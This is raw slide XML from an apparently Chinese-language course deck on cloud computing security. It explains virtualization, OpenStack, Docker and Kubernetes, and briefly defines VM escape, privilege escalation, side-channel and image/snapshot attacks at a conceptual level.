                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{509887B9-AFA6-49B4-94A5-B171142E20C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03343" y="5176395"/>
            <a:ext cx="2857500" cy="885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76067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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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412898" y="1351478"/>
            <a:ext cx="4254916" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>KVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hypervisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件，实际上是提供了一种虚拟化能力，模拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的运行，更为底层。但是它的用户交互并不良好，不方便使用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>于是，为了更好地管理虚拟机，就需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>OpenStack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样的云管理平台</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>它有点像个商店，负责管理商品（计算资源、存储资源、网络资源等），卖给用户，但它本身不制造商品（不具备虚拟化能力），它的商品，来自于各种虚拟化技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>KVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OpenStack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，都主要属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（基础设施即服务）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938DC120-9395-424F-930F-1D2D7D3C7EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5778351" y="1686988"/>
            <a:ext cx="5143502" cy="1414463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70078EAA-9405-4914-A3C4-3A0FB83C372E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4921102" y="3474039"/>
            <a:ext cx="6858000" cy="2543175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18763680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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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66186" y="1596027"/>
            <a:ext cx="4254916" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>容器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟机是操作系统级别的资源隔离，而容器本质上是进程级的资源隔离</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，就是创建容器的工具，是应用容器引擎。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>它启动时间很快，是秒级，而且对资源的利用率很高（一台主机可以同时运行几千个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>容器）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>它占的空间很小，虚拟机一般要几</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到几十</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，而容器只需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级甚至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAFDF0A4-3E01-4617-A9B2-431853DBE269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4921102" y="1193062"/>
            <a:ext cx="6858000" cy="2324100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4273096-CEEC-413B-935B-156E4F48E64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7176976" y="3962007"/>
            <a:ext cx="3304953" cy="2653143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24210622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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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66186" y="1766148"/>
            <a:ext cx="4254916" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>K8S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Kubernetes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，中文意思是舵手或导航员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>K8S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一个容器集群管理系统，主要职责是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>容器编排（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Container Orchestration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启动容器，自动化部署、扩展和管理容器应用，还有回收容器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>K8S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，关注的不再是基础设施和物理资源，而是应用层，所以，就属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PaaS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33CD4A25-E30B-4D0C-A9C7-D08583F30D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7374233" y="1084521"/>
            <a:ext cx="2232705" cy="1669312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A24CA4-9342-46F8-AA68-D27D0A318165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5794745" y="2976422"/>
            <a:ext cx="5346404" cy="3512290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33086119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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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976287" y="2882883"/>
            <a:ext cx="4254916" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>虚拟机逃逸、提权攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟机逃脱是指程序脱离正在运行并与主机操作系统交互的虚拟机的过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提权攻击是指用户通过系统漏洞，提升自己操作系统的使用权限的攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="VM escape attack model. | Download Scientific Diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6196971E-24FF-4840-A76D-72121E7B22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3513" y="1012304"/>
            <a:ext cx="3314700" cy="28003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hat Is Privilege Escalation and Why Is It Important? | Netsparker">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08F575A1-5022-490C-81ED-0902436CFF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5511" y="4180398"/>
            <a:ext cx="3850703" cy="2021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29655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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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49066" y="2274838"/>
            <a:ext cx="4254916" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>侧信道攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>云计算中，虚拟机共享宿主硬件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、内存、网络接口）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用边信道破解服务器对应私钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="浅谈侧信道攻击，什么是数字时代的隔空取“数”？-E安全">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651BF024-A0B2-4953-BBA9-758AE13ED2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0025" y="2640455"/>
            <a:ext cx="6096000" cy="2085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41337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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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49066" y="1813173"/>
            <a:ext cx="4254916" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>镜像和快照攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>云计算平台往往通过特定的景镜像创建虚拟机或者服务实例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>镜像的实例化是高度自动化的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>攻击者入侵虚拟机管理系统并感染镜像</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>增大攻击效率和影响范围</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>云平台可以随时挂起虚拟机并保存系统快照</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>攻击者非法恢复快照，造成一系列的安全隐患，且历史数据被清除，攻击行为被隐藏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4498160F-9B33-4965-A275-FD4D4AF8FD7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8797459" y="1699077"/>
            <a:ext cx="1066469" cy="1066469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C663E5A0-1890-41F9-9492-0B0332B8D801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7182679" y="1834865"/>
            <a:ext cx="879946" cy="879946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4AC4905-5455-4289-8E15-9D5F35EA4BD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7182679" y="3231047"/>
            <a:ext cx="2517914" cy="595342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944FB72D-63BF-4BFF-A274-6114EC99AF70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10403713" y="1930320"/>
            <a:ext cx="1191940" cy="1568982"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9672B486-51A2-4250-AFBE-01075F360481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859989" y="4015538"/>
            <a:ext cx="4876800" cy="2411520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
